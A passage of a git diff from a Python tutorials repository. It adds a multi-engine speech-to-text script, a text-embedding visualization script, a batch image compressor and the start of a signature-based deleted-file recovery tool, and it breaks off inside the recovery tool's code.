-    This will record your talking in 5 seconds and then uploads the audio data to Google to get the desired output.
\ No newline at end of file
+
+This folder contains the original `SpeechRecognition` examples and a modern 2026 transcription script.
+
+## Modern script
+
+`speech_to_text_2026.py` supports:
+
+- OpenAI `gpt-4o-transcribe` / `gpt-4o-mini-transcribe`
+- Faster-Whisper local/offline transcription
+- Groq Whisper transcription
+- long-audio chunking
+- microphone recording
+- SRT subtitle export
+
+Install modern dependencies:
+
+```bash
+pip install -U openai faster-whisper groq sounddevice scipy
+```
+
+For audio/video conversion and long-file chunking, install FFmpeg too.
+
+Examples:
+
+```bash
+# Local/offline transcription
+python speech_to_text_2026.py 16-122828-0002.wav --engine faster-whisper --model small --language en
+
+# OpenAI transcription; requires OPENAI_API_KEY
+python speech_to_text_2026.py meeting.mp3 --engine openai --language en
+
+# Cheaper OpenAI model
+python speech_to_text_2026.py meeting.mp3 --engine openai --model gpt-4o-mini-transcribe --language en
+
+# Groq Whisper; requires GROQ_API_KEY
+python speech_to_text_2026.py meeting.mp3 --engine groq --language en
+
+# Generate subtitles locally
+python speech_to_text_2026.py video.mp4 --engine faster-whisper --model large-v3 --srt captions.srt
+
+# Record 8 seconds from the microphone, then transcribe
+python speech_to_text_2026.py --record 8 --engine faster-whisper --model small --language en
+```
+
+## Legacy examples
+
+To run the older examples:
+
+```bash
+pip3 install -r requirements.txt
+```
+
+Recognize the text of an audio file named `16-122828-0002.wav`:
+
+```bash
+python recognizer.py 16-122828-0002.wav
+```
+
+Output:
+
+```text
+I believe you're just talking nonsense
+```
+
+Recognize text from your microphone after talking for 5 seconds:
+
+```bash
+python live_recognizer.py 5
+```
diff --git a/machine-learning/speech-recognition/speech_to_text_2026.py b/machine-learning/speech-recognition/speech_to_text_2026.py
new file mode 100644
index 00000000..bc3f9706
--- /dev/null
+++ b/machine-learning/speech-recognition/speech_to_text_2026.py
@@ -0,0 +1,296 @@
+from __future__ import annotations
+
+import argparse
+import os
+import shutil
+import subprocess
+import tempfile
+import wave
+from dataclasses import dataclass
+from pathlib import Path
+from typing import Iterable, Literal
+
+
+@dataclass(slots=True)
+class Segment:
+    """One transcribed audio segment."""
+
+    start: float
+    end: float
+    text: str
+
+
+def seconds_to_srt_time(seconds: float) -> str:
+    """Convert seconds to an SRT timestamp (HH:MM:SS,mmm)."""
+    milliseconds = round(seconds * 1000)
+    hours, remainder = divmod(milliseconds, 3_600_000)
+    minutes, remainder = divmod(remainder, 60_000)
+    secs, millis = divmod(remainder, 1000)
+    return f"{hours:02}:{minutes:02}:{secs:02},{millis:03}"
+
+
+def write_srt(segments: Iterable[Segment], output_path: str | Path) -> None:
+    """Write transcript segments to an SRT subtitle file."""
+    lines: list[str] = []
+    subtitle_index = 1
+    for segment in segments:
+        text = segment.text.strip()
+        if not text:
+            continue
+        lines.extend(
+            [
+                str(subtitle_index),
+                f"{seconds_to_srt_time(segment.start)} --> {seconds_to_srt_time(segment.end)}",
+                text,
+                "",
+            ]
+        )
+        subtitle_index += 1
+    Path(output_path).write_text("\n".join(lines), encoding="utf-8")
+
+
+def convert_to_wav(input_path: str | Path, output_path: str | Path, sample_rate: int = 16_000) -> None:
+    """Convert any FFmpeg-readable audio/video file to mono 16 kHz WAV."""
+    if not shutil.which("ffmpeg"):
+        raise RuntimeError("FFmpeg is required. Install it from https://ffmpeg.org/.")
+
+    subprocess.run(
+        [
+            "ffmpeg",
+            "-y",
+            "-i",
+            str(input_path),
+            "-ac",
+            "1",
+            "-ar",
+            str(sample_rate),
+            "-vn",
+            str(output_path),
+        ],
+        check=True,
+        stdout=subprocess.DEVNULL,
+        stderr=subprocess.DEVNULL,
+    )
+
+
+def chunk_wav(input_wav: str | Path, chunk_seconds: int = 600) -> list[Path]:
+    """Split a WAV file into fixed-size chunks without loading the whole file in memory."""
+    input_wav = Path(input_wav)
+    if chunk_seconds <= 0:
+        raise ValueError("chunk_seconds must be positive")
+
+    output_dir = input_wav.parent / f"{input_wav.stem}_chunks"
+    output_dir.mkdir(parents=True, exist_ok=True)
+
+    chunks: list[Path] = []
+    with wave.open(str(input_wav), "rb") as reader:
+        params = reader.getparams()
+        frames_per_chunk = int(params.framerate * chunk_seconds)
+        index = 1
+        while True:
+            frames = reader.readframes(frames_per_chunk)
+            if not frames:
+                break
+            chunk_path = output_dir / f"chunk_{index:04d}.wav"
+            with wave.open(str(chunk_path), "wb") as writer:
+                writer.setparams(params)
+                writer.writeframes(frames)
+            chunks.append(chunk_path)
+            index += 1
+    return chunks
+
+
+def transcribe_with_openai(
+    audio_path: str | Path,
+    *,
+    model: str = "gpt-4o-transcribe",
+    language: str | None = None,
+    prompt: str | None = None,
+) -> str:
+    """Transcribe audio using OpenAI speech-to-text models."""
+    try:
+        from openai import OpenAI
+    except ImportError as exc:
+        raise RuntimeError("Install the OpenAI SDK first: pip install openai") from exc
+
+    kwargs: dict[str, object] = {"model": model}
+    if language:
+        kwargs["language"] = language
+    if prompt:
+        kwargs["prompt"] = prompt
+
+    client = OpenAI()
+    with Path(audio_path).open("rb") as audio_file:
+        transcript = client.audio.transcriptions.create(file=audio_file, **kwargs)
+    return transcript.text
+
+
+def transcribe_large_file_with_openai(
+    input_path: str | Path,
+    *,
+    model: str = "gpt-4o-transcribe",
+    language: str | None = None,
+    prompt: str | None = None,
+    chunk_seconds: int = 600,
+) -> str:
+    """Convert, chunk, and transcribe a long file with OpenAI's API."""
+    with tempfile.TemporaryDirectory() as temp_dir:
+        temp_dir_path = Path(temp_dir)
+        wav_path = temp_dir_path / "audio.wav"
+        convert_to_wav(input_path, wav_path)
+        chunks = chunk_wav(wav_path, chunk_seconds=chunk_seconds)
+        parts = [
+            transcribe_with_openai(chunk, model=model, language=language, prompt=prompt)
+            for chunk in chunks
+        ]
+    return "\n".join(part.strip() for part in parts if part.strip())
+
+
+def transcribe_with_groq(
+    audio_path: str | Path,
+    *,
+    model: str = "whisper-large-v3-turbo",
+    language: str | None = None,
+    prompt: str | None = None,
+) -> str:
+    """Transcribe audio with Groq's OpenAI-compatible Whisper endpoint."""
+    try:
+        from groq import Groq
+    except ImportError as exc:
+        raise RuntimeError("Install the Groq SDK first: pip install groq") from exc
+
+    kwargs: dict[str, object] = {"model": model, "temperature": 0.0}
+    if language:
+        kwargs["language"] = language
+    if prompt:
+        kwargs["prompt"] = prompt
+
+    client = Groq(api_key=os.environ.get("GROQ_API_KEY"))
+    with Path(audio_path).open("rb") as audio_file:
+        transcript = client.audio.transcriptions.create(file=audio_file, **kwargs)
+    return transcript.text
+
+
+def transcribe_with_faster_whisper(
+    audio_path: str | Path,
+    *,
+    model_size: str = "large-v3",
+    device: Literal["auto", "cpu", "cuda"] = "auto",
+    compute_type: str = "auto",
+    language: str | None = None,
+) -> tuple[str, list[Segment]]:
+    """Transcribe audio locally with Faster-Whisper."""
+    try:
+        from faster_whisper import WhisperModel
+    except ImportError as exc:
+        raise RuntimeError("Install Faster-Whisper first: pip install faster-whisper") from exc
+
+    if device == "auto":
+        device = "cuda" if _cuda_is_available() else "cpu"
+    if compute_type == "auto":
+        compute_type = "float16" if device == "cuda" else "int8"
+
+    model = WhisperModel(model_size, device=device, compute_type=compute_type)
+    kwargs: dict[str, object] = {
+        "beam_size": 5,
+        "vad_filter": True,
+        "vad_parameters": {"min_silence_duration_ms": 500},
+    }
+    if language:
+        kwargs["language"] = language
+
+    raw_segments, _info = model.transcribe(str(audio_path), **kwargs)
+    segments = [Segment(start=s.start, end=s.end, text=s.text) for s in raw_segments]
+    return "".join(s.text for s in segments).strip(), segments
+
+
+def record_microphone(output_path: str | Path = "microphone.wav", seconds: int = 8, sample_rate: int = 16_000) -> Path:
+    """Record microphone audio to a WAV file."""
+    try:
+        import sounddevice as sd
+        from scipy.io.wavfile import write
+    except ImportError as exc:
+        raise RuntimeError("Install microphone dependencies: pip install sounddevice scipy") from exc
+
+    output_path = Path(output_path)
+    print(f"Recording for {seconds} seconds...")
+    audio = sd.rec(int(seconds * sample_rate), samplerate=sample_rate, channels=1, dtype="int16")
+    sd.wait()
+    write(output_path, sample_rate, audio)
+    print(f"Saved recording to {output_path}")
+    return output_path
+
+
+def _cuda_is_available() -> bool:
+    """Return True when PyTorch sees a CUDA GPU, without requiring torch at install time."""
+    try:
+        import torch
+
+        return bool(torch.cuda.is_available())
+    except Exception:
+        return False
+
+
+def main(argv: list[str] | None = None) -> int:
+    parser = argparse.ArgumentParser(description="Transcribe audio to text in Python.")
+    parser.add_argument("audio", nargs="?", help="Path to an audio/video file")
+    parser.add_argument("--engine", choices=("openai", "groq", "faster-whisper"), default="faster-whisper")
+    parser.add_argument("--model", default=None, help="Model name. Defaults depend on the engine.")
+    parser.add_argument("--language", default=None, help="Optional ISO-639-1 language hint, e.g. en, fr, es")
+    parser.add_argument("--prompt", default=None, help="Optional context prompt for API transcription")
+    parser.add_argument("--srt", default=None, help="Optional .srt output path (Faster-Whisper engine)")
+    parser.add_argument("--long", action="store_true", help="Convert/chunk long files before OpenAI transcription")
+    parser.add_argument("--chunk-seconds", type=int, default=600, help="Chunk size for --long, default: 600")
+    parser.add_argument("--record", type=int, metavar="SECONDS", help="Record from microphone first")
+    args = parser.parse_args(argv)
+
+    audio_path: Path
+    if args.record:
+        audio_path = record_microphone(seconds=args.record)
+    else:
+        if not args.audio:
+            parser.error("provide an audio file or use --record SECONDS")
+        audio_path = Path(args.audio)
+        if not audio_path.exists():
+            parser.error(f"File not found: {audio_path}")
+
+    if args.engine == "openai":
+        if args.long:
+            print(transcribe_large_file_with_openai(
+                audio_path,
+                model=args.model or "gpt-4o-transcribe",
+                language=args.language,
+                prompt=args.prompt,
+                chunk_seconds=args.chunk_seconds,
+            ))
+        else:
+            print(transcribe_with_openai(
+                audio_path,
+                model=args.model or "gpt-4o-transcribe",
+                language=args.language,
+                prompt=args.prompt,
+            ))
+        return 0
+
+    if args.engine == "groq":
+        print(transcribe_with_groq(
+            audio_path,
+            model=args.model or "whisper-large-v3-turbo",
+            language=args.language,
+            prompt=args.prompt,
+        ))
+        return 0
+
+    text, segments = transcribe_with_faster_whisper(
+        audio_path,
+        model_size=args.model or "large-v3",
+        language=args.language,
+    )
+    print(text)
+    if args.srt:
+        write_srt(segments, args.srt)
+    return 0
+
+
+if __name__ == "__main__":
+    raise SystemExit(main())
diff --git a/machine-learning/text-embeddings-visualization/embedding_analysis.py b/machine-learning/text-embeddings-visualization/embedding_analysis.py
new file mode 100644
index 00000000..01179276
--- /dev/null
+++ b/machine-learning/text-embeddings-visualization/embedding_analysis.py
@@ -0,0 +1,125 @@
+"""
+Text Embeddings: Generation, Comparison & Visualization
+========================================================
+Requirements: pip install sentence-transformers numpy matplotlib seaborn scikit-learn
+"""
+import numpy as np
+from sentence_transformers import SentenceTransformer
+import matplotlib; matplotlib.use('Agg')
+import matplotlib.pyplot as plt
+import seaborn as sns
+from sklearn.decomposition import PCA
+from sklearn.manifold import TSNE
+from sklearn.metrics.pairwise import cosine_similarity
+from rich.console import Console
+from rich.table import Table
+from rich.panel import Panel
+
+console = Console()
+
+# 50 sentences across 10 categories
+sentences = [
+    "The computer processed data at incredible speed",
+    "Machine learning models require large amounts of training data",
+    "Python is widely used for artificial intelligence applications",
+    "Cloud computing enables scalable web services",
+    "The algorithm optimized the search results efficiently",
+    "The dog chased the ball across the green field",
+    "Cats are independent creatures that enjoy solitude",
+    "The majestic eagle soared high above the mountains",
+    "Dolphins are highly intelligent marine mammals",
+    "The tiger stalked its prey through the dense jungle",
+    "The chef prepared a delicious Italian pasta dish",
+    "Fresh ingredients make the best homemade meals",
+    "The chocolate cake was rich and decadently sweet",
+    "Grilling steak requires high heat and proper timing",
+    "Japanese sushi demands precise knife skills and fresh fish",
+    "The ancient ruins attracted tourists from around the world",
+    "Paris is known as the city of love and romance",
+    "The tropical beach had crystal clear turquoise water",
+    "Mountain climbers reached the summit after days of effort",
+    "The bustling city never sleeps with its vibrant nightlife",
+    "She felt overwhelming joy when she received the good news",
+    "Heartbreak can feel like a physical pain in your chest",
+    "Their friendship had lasted through decades of ups and downs",
+    "Pride swelled in his chest as he watched his daughter graduate",
+    "Anxiety crept in as the deadline approached rapidly",
+    "The scientist conducted experiments to test the hypothesis",
+    "Mathematics is the language of the universe",
+    "Quantum physics challenges our understanding of reality",
+    "DNA contains the genetic blueprint of all living organisms",
+    "The theory of evolution explains the diversity of life",
+    "The soccer team celebrated their championship victory",
+    "Swimming is an excellent full-body cardiovascular workout",
+    "The marathon runner crossed the finish line exhausted but proud",
+    "Basketball requires both athleticism and strategic thinking",
+    "Yoga combines physical poses with breathing and meditation",
+    "The painter captured the sunset in brilliant orange and red hues",
+    "Music has the power to evoke deep emotional responses",
+    "The novelist spent years crafting the perfect ending",
+    "Dance allows expression beyond what words can convey",
+    "Photography freezes a single moment for eternity",
+    "The startup raised millions in venture capital funding",
+    "Effective leadership requires both vision and empathy",
+    "The company announced record profits for the fiscal year",
+    "Remote work has transformed the modern workplace",
+    "Negotiation skills are essential for closing major deals",
+    "Regular exercise reduces the risk of heart disease",
+    "The doctor prescribed antibiotics for the bacterial infection",
+    "Mental health is just as important as physical health",
+    "Vaccines have saved millions of lives throughout history",
+    "A balanced diet provides essential nutrients for the body",
+]
+categories = (["Tech"]*5 + ["Animals"]*5 + ["Food"]*5 + ["Travel"]*5 +
+              ["Emotions"]*5 + ["Science"]*5 + ["Sports"]*5 + ["Art"]*5 +
+              ["Business"]*5 + ["Health"]*5)
+
+# Generate embeddings
+model = SentenceTransformer("all-MiniLM-L6-v2")
+embeddings = model.encode(sentences, convert_to_numpy=True, normalize_embeddings=True)
+console.print(f"[green]Embeddings: {embeddings.shape}[/green]")
+
+# PCA
+pca = PCA(n_components=2, random_state=42)
+e2d = pca.fit_transform(embeddings)
+cat_colors = {"Tech":"#3b82f6","Animals":"#10b981","Food":"#f59e0b","Travel":"#8b5cf6",
+              "Emotions":"#ef4444","Science":"#06b6d4","Sports":"#f97316","Art":"#ec4899",
+              "Business":"#6366f1","Health":"#14b8a6"}
+fig, ax = plt.subplots(figsize=(16,11))
+for cat in sorted(set(categories)):
+    mask = [c==cat for c in categories]
+    ax.scatter(e2d[mask,0], e2d[mask,1], c=cat_colors[cat], label=cat, alpha=0.75, s=120, edgecolors='white')
+ax.legend(ncol=2); ax.set_title("PCA: Text Embeddings"); plt.tight_layout()
+plt.savefig('01_pca.png', dpi=150); plt.close()
+
+# t-SNE
+tsne = TSNE(n_components=2, perplexity=8, random_state=42, max_iter=1000)
+e2dt = tsne.fit_transform(embeddings)
+fig, ax = plt.subplots(figsize=(16,11))
+for cat in sorted(set(categories)):
+    mask = [c==cat for c in categories]
+    ax.scatter(e2dt[mask,0], e2dt[mask,1], c=cat_colors[cat], label=cat, alpha=0.75, s=120, edgecolors='white')
+ax.legend(ncol=2); ax.set_title("t-SNE: Text Embeddings"); plt.tight_layout()
+plt.savefig('02_tsne.png', dpi=150); plt.close()
+
+# Heatmap
+idx = [0,5,10,15,20,25,30,35,40,45]
+sim = cosine_similarity(embeddings[idx])
+fig, ax = plt.subplots(figsize=(14,12))
+sns.heatmap(sim, annot=True, fmt=".2f", cmap="YlOrRd", vmin=0, vmax=1, ax=ax)
+ax.set_title("Cosine Similarity Heatmap"); plt.tight_layout()
+plt.savefig('03_heatmap.png', dpi=150); plt.close()
+
+# Semantic similarity demo
+pairs = [("The dog played in the park","A canine ran through the green field"),
+         ("The dog played in the park","The stock market crashed yesterday"),
+         ("I love eating pizza and pasta","Italian cuisine is my favorite food"),
+         ("I love eating pizza and pasta","The spaceship launched into orbit")]
+for a,b in pairs:
+    ea = model.encode([a], normalize_embeddings=True)[0]
+    eb = model.encode([b], normalize_embeddings=True)[0]
+    sim = float(np.dot(ea,eb))
+    rel = "SAME" if sim > 0.5 else "DIFF"
+    console.print(f"  [{rel}] {sim*100:.1f}% — {a[:40]} <-> {b[:40]}")
+
+console.print("[green]Analysis complete![/green]")
diff --git a/python-for-multimedia/compress-image/README.md b/python-for-multimedia/compress-image/README.md
index 32f51450..919414cc 100644
--- a/python-for-multimedia/compress-image/README.md
+++ b/python-for-multimedia/compress-image/README.md
@@ -1,4 +1,56 @@
-# [How to Compress Images in Python](https://www.thepythoncode.com/article/compress-images-in-python)
-To run this:
-- `pip3 install -r requirements.txt`
-- `python compress_image.py --help`
\ No newline at end of file
+# Compress Image
+
+Advanced Image Compressor with Batch Processing
+
+This script provides advanced image compression and resizing features using Python and Pillow.
+
+## Features
+
+- Batch processing of multiple images or directories
+- Lossy and lossless compression (PNG/WebP)
+- Optional JPEG conversion
+- Resize by ratio or explicit dimensions
+- Preserve or strip metadata (EXIF)
+- Custom output directory
+- Progress bar using `tqdm`
+- Detailed logging
+
+## Requirements
+
+- Python 3.6+
+- [Pillow](https://pypi.org/project/Pillow/)
+- [tqdm](https://pypi.org/project/tqdm/)
+
+Install dependencies:
+
+```bash
+pip install pillow tqdm
+```
+
+## Usage
+
+```bash
+python compress_image.py [options] <input> [<input> ...]
+```
+
+## Options
+- `-o`, `--output-dir`: Output directory (default: same as input)
+- `-q`, `--quality`: Compression quality (0-100, default: 85)
+- `-r`, `--resize-ratio`: Resize ratio (0-1, default: 1.0)
+- `-w`, `--width`: Output width (requires `--height`)
+- `-hh`, `--height`: Output height (requires `--width`)
+- `-j`, `--to-jpg`: Convert output to JPEG
+- `-m`, `--no-metadata`: Strip metadata (default: preserve)
+- `-l`, `--lossless`: Use lossless compression (PNG/WEBP)
+
+## Examples
+
+```bash
+python compress_image.py image.jpg -r 0.5 -q 80 -j
+python compress_image.py images/ -o output/ -m
+python compress_image.py image.png -l
+```
+
+## License
+
+MIT License.
diff --git a/python-for-multimedia/compress-image/compress_image.py b/python-for-multimedia/compress-image/compress_image.py
index 6560b887..f1696aa0 100644
--- a/python-for-multimedia/compress-image/compress_image.py
+++ b/python-for-multimedia/compress-image/compress_image.py
@@ -1,88 +1,104 @@
 import os
 from PIL import Image
+import argparse
+import logging
+from tqdm import tqdm
 
+# Configure logging
+logging.basicConfig(level=logging.INFO, format='%(asctime)s - %(levelname)s - %(message)s')
+logger = logging.getLogger(__name__)
 
 def get_size_format(b, factor=1024, suffix="B"):
-    """
-    Scale bytes to its proper byte format
-    e.g:
-        1253656 => '1.20MB'
-        1253656678 => '1.17GB'
-    """
+    """Scale bytes to its proper byte format."""
     for unit in ["", "K", "M", "G", "T", "P", "E", "Z"]:
         if b < factor:
             return f"{b:.2f}{unit}{suffix}"
         b /= factor
     return f"{b:.2f}Y{suffix}"
-    
 
-
-def compress_img(image_name, new_size_ratio=0.9, quality=90, width=None, height=None, to_jpg=True):
-    # load the image to memory
-    img = Image.open(image_name)
-    # print the original image shape
-    print("[*] Image shape:", img.size)
-    # get the original image size in bytes
-    image_size = os.path.getsize(image_name)
-    # print the size before compression/resizing
-    print("[*] Size before compression:", get_size_format(image_size))
-    if new_size_ratio < 1.0:
-        # if resizing ratio is below 1.0, then multiply width & height with this ratio to reduce image size
-        img = img.resize((int(img.size[0] * new_size_ratio), int(img.size[1] * new_size_ratio)), Image.LANCZOS)
-        # print new image shape
-        print("[+] New Image shape:", img.size)
-    elif width and height:
-        # if width and height are set, resize with them instead
-        img = img.resize((width, height), Image.LANCZOS)
-        # print new image shape
-        print("[+] New Image shape:", img.size)
-    # split the filename and extension
-    filename, ext = os.path.splitext(image_name)
-    # make new filename appending _compressed to the original file name
-    if to_jpg:
-        # change the extension to JPEG
-        new_filename = f"{filename}_compressed.jpg"
-    else:
-        # retain the same extension of the original image
-        new_filename = f"{filename}_compressed{ext}"
+def compress_image(
+    input_path,
+    output_dir=None,
+    quality=85,
+    resize_ratio=1.0,
+    width=None,
+    height=None,
+    to_jpg=False,
+    preserve_metadata=True,
+    lossless=False,
+):
+    """Compress an image with advanced options."""
     try:
-        # save the image with the corresponding quality and optimize set to True
-        img.save(new_filename, quality=quality, optimize=True)
-    except OSError:
-        # convert the image to RGB mode first
-        img = img.convert("RGB")
-        # save the image with the corresponding quality and optimize set to True
-        img.save(new_filename, quality=quality, optimize=True)
-    print("[+] New file saved:", new_filename)
-    # get the new image size in bytes
-    new_image_size = os.path.getsize(new_filename)
-    # print the new size in a good format
-    print("[+] Size after compression:", get_size_format(new_image_size))
-    # calculate the saving bytes
-    saving_diff = new_image_size - image_size
-    # print the saving percentage
-    print(f"[+] Image size change: {saving_diff/image_size*100:.2f}% of the original image size.")
-    
-    
+        img = Image.open(input_path)
+        logger.info(f"[*] Processing: {os.path.basename(input_path)}")
+        logger.info(f"[*] Original size: {get_size_format(os.path.getsize(input_path))}")
+
+        # Resize if needed
+        if resize_ratio < 1.0:
+            new_size = (int(img.size[0] * resize_ratio), int(img.size[1] * resize_ratio))
+            img = img.resize(new_size, Image.LANCZOS)
+            logger.info(f"[+] Resized to: {new_size}")
+        elif width and height:
+            img = img.resize((width, height), Image.LANCZOS)
+            logger.info(f"[+] Resized to: {width}x{height}")
+
+        # Prepare output path
+        filename, ext = os.path.splitext(os.path.basename(input_path))
+        output_ext = ".jpg" if to_jpg else ext
+        output_filename = f"{filename}_compressed{output_ext}"
+        output_path = os.path.join(output_dir or os.path.dirname(input_path), output_filename)
+
+        # Save with options
+        save_kwargs = {"quality": quality, "optimize": True}
+        if not preserve_metadata:
+            save_kwargs["exif"] = b""  # Strip metadata
+        if lossless and ext.lower() in (".png", ".webp"):
+            save_kwargs["lossless"] = True
+
+        try:
+            img.save(output_path, **save_kwargs)
+        except OSError:
+            img = img.convert("RGB")
+            img.save(output_path, **save_kwargs)
+
+        logger.info(f"[+] Saved to: {output_path}")
+        logger.info(f"[+] New size: {get_size_format(os.path.getsize(output_path))}")
+    except Exception as e:
+        logger.error(f"[!] Error processing {input_path}: {e}")
+
+def batch_compress(
+    input_paths,
+    output_dir=None,
+    quality=85,
+    resize_ratio=1.0,
+    width=None,
+    height=None,
+    to_jpg=False,
+    preserve_metadata=True,
+    lossless=False,
+):
+    """Compress multiple images."""
+    if output_dir and not os.path.exists(output_dir):
+        os.makedirs(output_dir, exist_ok=True)
+    for path in tqdm(input_paths, desc="Compressing images"):
+        compress_image(path, output_dir, quality, resize_ratio, width, height, to_jpg, preserve_metadata, lossless)
+
 if __name__ == "__main__":
-    import argparse
-    parser = argparse.ArgumentParser(description="Simple Python script for compressing and resizing images")
-    parser.add_argument("image", help="Target image to compress and/or resize")
-    parser.add_argument("-j", "--to-jpg", action="store_true", help="Whether to convert the image to the JPEG format")
-    parser.add_argument("-q", "--quality", type=int, help="Quality ranging from a minimum of 0 (worst) to a maximum of 95 (best). Default is 90", default=90)
-    parser.add_argument("-r", "--resize-ratio", type=float, help="Resizing ratio from 0 to 1, setting to 0.5 will multiply width & height of the image by 0.5. Default is 1.0", default=1.0)
-    parser.add_argument("-w", "--width", type=int, help="The new width image, make sure to set it with the `height` parameter")
-    parser.add_argument("-hh", "--height", type=int, help="The new height for the image, make sure to set it with the `width` parameter")
+    parser = argparse.ArgumentParser(description="Advanced Image Compressor with Batch Processing")
+    parser.add_argument("input", nargs='+', help="Input image(s) or directory")
+    parser.add_argument("-o", "--output-dir", help="Output directory (default: same as input)")
+    parser.add_argument("-q", "--quality", type=int, default=85, help="Compression quality (0-100)")
+    parser.add_argument("-r", "--resize-ratio", type=float, default=1.0, help="Resize ratio (0-1)")
+    parser.add_argument("-w", "--width", type=int, help="Output width (requires --height)")
+    parser.add_argument("-hh", "--height", type=int, help="Output height (requires --width)")
+    parser.add_argument("-j", "--to-jpg", action="store_true", help="Convert output to JPEG")
+    parser.add_argument("-m", "--no-metadata", action="store_false", help="Strip metadata")
+    parser.add_argument("-l", "--lossless", action="store_true", help="Use lossless compression (PNG/WEBP)")
+
     args = parser.parse_args()
-    # print the passed arguments
-    print("="*50)
-    print("[*] Image:", args.image)
-    print("[*] To JPEG:", args.to_jpg)
-    print("[*] Quality:", args.quality)
-    print("[*] Resizing ratio:", args.resize_ratio)
-    if args.width and args.height:
-        print("[*] Width:", args.width)
-        print("[*] Height:", args.height)
-    print("="*50)
-    # compress the image
-    compress_img(args.image, args.resize_ratio, args.quality, args.width, args.height, args.to_jpg)
\ No newline at end of file
+    input_paths = []
+    for path in args.input:
+        if os.path.isdir(path): input_paths.extend(os.path.join(path, f) for f in os.listdir(path) if f.lower().endswith((".jpg",".jpeg",".png",".webp")))
+        else: input_paths.append(path)
+    if not input_paths: logger.error("No valid images found!"); exit(1)
+    batch_compress(input_paths, args.output_dir, args.quality, args.resize_ratio, args.width, args.height, args.to_jpg, args.no_metadata, args.lossless)
diff --git a/python-for-multimedia/recover-deleted-files/README.md b/python-for-multimedia/recover-deleted-files/README.md
new file mode 100644
index 00000000..9b57b100
--- /dev/null
+++ b/python-for-multimedia/recover-deleted-files/README.md
@@ -0,0 +1 @@
+# [How to Recover Deleted Files with Python](https://thepythoncode.com/article/how-to-recover-deleted-file-with-python)
\ No newline at end of file
diff --git a/python-for-multimedia/recover-deleted-files/file_recovery.py b/python-for-multimedia/recover-deleted-files/file_recovery.py
new file mode 100644
index 00000000..057995c4
--- /dev/null
+++ b/python-for-multimedia/recover-deleted-files/file_recovery.py
@@ -0,0 +1,552 @@
+
+import os
+import sys
+import argparse
+import struct
+import time
+import logging
+import subprocess
+import signal
+from datetime import datetime, timedelta
+from pathlib import Path
+import binascii
+
+# File signatures (magic numbers) for common file types
+FILE_SIGNATURES = {
+    'jpg': [bytes([0xFF, 0xD8, 0xFF, 0xE0]), bytes([0xFF, 0xD8, 0xFF, 0xE1])],
+    'png': [bytes([0x89, 0x50, 0x4E, 0x47, 0x0D, 0x0A, 0x1A, 0x0A])],
+    'gif': [bytes([0x47, 0x49, 0x46, 0x38, 0x37, 0x61]), bytes([0x47, 0x49, 0x46, 0x38, 0x39, 0x61])],
+    'pdf': [bytes([0x25, 0x50, 0x44, 0x46])],
+    'zip': [bytes([0x50, 0x4B, 0x03, 0x04])],
+    'docx': [bytes([0x50, 0x4B, 0x03, 0x04, 0x14, 0x00, 0x06, 0x00])],  # More specific signature
+    'xlsx': [bytes([0x50, 0x4B, 0x03, 0x04, 0x14, 0x00, 0x06, 0x00])],  # More specific signature
+    'pptx': [bytes([0x50, 0x4B, 0x03, 0x04, 0x14, 0x00, 0x06, 0x00])],  # More specific signature
+    'mp3': [bytes([0x49, 0x44, 0x33])],
+    'mp4': [bytes([0x00, 0x00, 0x00, 0x18, 0x66, 0x74, 0x79, 0x70])],
+    'avi': [bytes([0x52, 0x49, 0x46, 0x46])],
+}
+
+# Additional validation patterns to check after finding the signature
+# This helps reduce false positives
+VALIDATION_PATTERNS = {
+    'docx': [b'word/', b'[Content_Types].xml'],
+    'xlsx': [b'xl/', b'[Content_Types].xml'],
+    'pptx': [b'ppt/', b'[Content_Types].xml'],
+    'zip': [b'PK\x01\x02'],  # Central directory header
+    'pdf': [b'obj', b'endobj'],
+}
+
+# File endings (trailer signatures) for some file types
+FILE_TRAILERS = {
+    'jpg': bytes([0xFF, 0xD9]),
+    'png': bytes([0x49, 0x45, 0x4E, 0x44, 0xAE, 0x42, 0x60, 0x82]),
+    'gif': bytes([0x00, 0x3B]),
+    'pdf': bytes([0x25, 0x25, 0x45, 0x4F, 0x46]),
+}
+
+# Maximum file sizes to prevent recovering corrupted files
+MAX_FILE_SIZES = {
+    'jpg': 30 * 1024 * 1024,  # 30MB
+    'png': 50 * 1024 * 1024,  # 50MB
+    'gif': 20 * 1024 * 1024,  # 20MB
+    'pdf': 100 * 1024 * 1024,  # 100MB
+    'zip': 200 * 1024 * 1024,  # 200MB
+    'docx': 50 * 1024 * 1024,  # 50MB
+    'xlsx': 50 * 1024 * 1024,  # 50MB
+    'pptx': 100 * 1024 * 1024,  # 100MB
+    'mp3': 50 * 1024 * 1024,  # 50MB
+    'mp4': 1024 * 1024 * 1024,  # 1GB
+    'avi': 1024 * 1024 * 1024,  # 1GB
+}
+
+class FileRecoveryTool:
+    def __init__(self, source, output_dir, file_types=None, deep_scan=False, 
+                 block_size=512, log_level=logging.INFO, skip_existing=True,
+                 max_scan_size=None, timeout_minutes=None):
+        """
+        Initialize the file recovery tool
+        
+        Args:
+            source (str): Path to the source device or directory
+            output_dir (str): Directory to save recovered files
+            file_types (list): List of file types to recover
+            deep_scan (bool): Whether to perform a deep scan
+            block_size (int): Block size for reading data
+            log_level (int): Logging level
+            skip_existing (bool): Skip existing files in output directory
+            max_scan_size (int): Maximum number of bytes to scan
+            timeout_minutes (int): Timeout in minutes
+        """
+        self.source = source
+        self.output_dir = Path(output_dir)
+        self.file_types = file_types if file_types else list(FILE_SIGNATURES.keys())
+        self.deep_scan = deep_scan
+        self.block_size = block_size
+        self.skip_existing = skip_existing
+        self.max_scan_size = max_scan_size
+        self.timeout_minutes = timeout_minutes
+        self.timeout_reached = False
+        
+        # Setup logging
+        self.setup_logging(log_level)
+        
+        # Create output directory if it doesn't exist
+        self.output_dir.mkdir(parents=True, exist_ok=True)
+        
+        # Statistics
+        self.stats = {
+            'total_files_recovered': 0,
+            'recovered_by_type': {},
+            'start_time': time.time(),
+            'bytes_scanned': 0,
+            'false_positives': 0
+        }
+        
+        for file_type in self.file_types:
+            self.stats['recovered_by_type'][file_type] = 0
+    
+    def setup_logging(self, log_level):
+        """Set up logging configuration"""
+        logging.basicConfig(
+            level=log_level,
+            format='%(asctime)s - %(levelname)s - %(message)s',
+            handlers=[
+                logging.StreamHandler(),
+                logging.FileHandler(f"recovery_{datetime.now().strftime('%Y%m%d_%H%M%S')}.log")
+            ]
+        )
+        self.logger = logging.getLogger('file_recovery')
+    
+    def _setup_timeout(self):
+        """Set up a timeout handler"""
+        if self.timeout_minutes:
+            def timeout_handler(signum, frame):
+                self.logger.warning(f"Timeout of {self.timeout_minutes} minutes reached!")
